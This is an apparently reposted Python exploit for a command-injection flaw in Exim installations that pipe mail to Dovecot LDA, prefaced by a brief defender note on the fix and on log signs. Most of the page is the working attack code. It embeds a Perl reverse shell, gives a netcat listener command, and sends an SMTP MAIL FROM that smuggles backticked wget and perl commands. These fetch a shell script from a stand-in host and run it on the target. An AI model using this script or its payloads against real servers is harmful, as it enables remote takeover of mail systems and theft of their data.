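Exim sender_address Remote Command Execution

Context for defenders: per the advisory linked in the script header (rt-sa-2013-001), this concerns Exim installations that hand mail to Dovecot LDA through a pipe transport with the `use_shell` option set, so shell metacharacters in the envelope sender reach a shell. Removing `use_shell` from that transport closes the issue. SMTP logs showing backticks or `${IFS}` inside a MAIL FROM address indicate an attempt.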

Source: Internet
Author: User
#!/usr/bin/env python ####################################################################################      Exim sender_address Parameter - Remote Command Execution Exploit        ######################################################################################                                                                              #### Vulnerability found by RedTeam Pentesting GmbH                               #### https://www.redteam-pentesting.de/en/advisories/rt-sa-2013-001/              ####                                                                              #### Exploit written by eKKiM                                                     #### http://rdtx.eu/exim-with-dovecot-lda-rce-exploit/                            ####                                                                              ######################################################################################                                    USAGE                                     ######################################################################################                                                                              #### Edit the PERL REVERSE SHELL MY_CONNECTBACK_IP and MY_CONNECTBACK_PORT and   #### upload this perl reverse shell script to a webserver.                        
####                                                                              #### Edit the PERL_SHELL variable to your own connectback script URL              ####                                                                              #### Start a listener: nc -vvn -l -p CONNECT_BACK_PORT                            ####                                                                              #### Let the exploitin begin                                                      ####                                                                              ####################################################################################  ####### PERL REVERSE SHELL ######### use Socket;$i="MY_CONNECTBACK_IP";$p=MY_CONNECTBACK_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};####### PERL REVERSE SHELL #######  import socketimport sys ####### URL TO YOUR CONNECTBACK SHELL #######PERL_SHELL = "myhost.com/shell.pl"####### URL TO YOUR CONNECTBACK SHELL ####### if len(sys.argv) != 2:    print "Usage: exim_exploit.py <target_ip> <optional_rcpt_address>"    print " <target_ip> target you want to test"    print " <optional_rcpt_address> an address which is accepted by exim (default: postmaster@localhost)"    exit(1) RCPT_TO = "postmaster@localhost"HOST = sys.argv[1]PORT = 25 def read_line(s):    ret = ''     while True:        c = s.recv(1)         if c == '\n' or c == '':            break        else:            ret += c     return ret  if len(sys.argv) == 3:    RCPT_TO = sys.argv[2]     print "Exim sender_address Parameter - Remote Command Execution Exploit"print "Bug discovered by RedTeam Pentesting GmbH"print "Exploit created by eKKiM"print "" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((HOST, PORT)) data = read_line(s);if not(data.startswith("220")):    print "[ERROR] Is it SMTP Server?"    
exit(1)     s.send("EHLO domain.local\n")s.recv(4096) s.send("MAIL FROM: x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}" + PERL_SHELL + "``perl${IFS}/tmp/p.pl`@blaat.com\n") data = read_line(s);if not(data.startswith("250")):    print "[ERROR] MAIL FROM not accepted"    exit(1) s.send("RCPT TO: " + RCPT_TO + "\n")data = read_line(s);if not(data.startswith("250")):    print "[ERROR] RCPT_TO not accepted"    exit(1) s.send("DATA\n")data = read_line(s);if not(data.startswith("354")):    print "[ERROR] Cannot send email content"    exit(1)     s.send("x\n.\n")data = read_line(s);if not(data.startswith("250")):    print "[ERROR] email content revoked"    exit(1)     print "[OK] Recieved shell?" s.close()
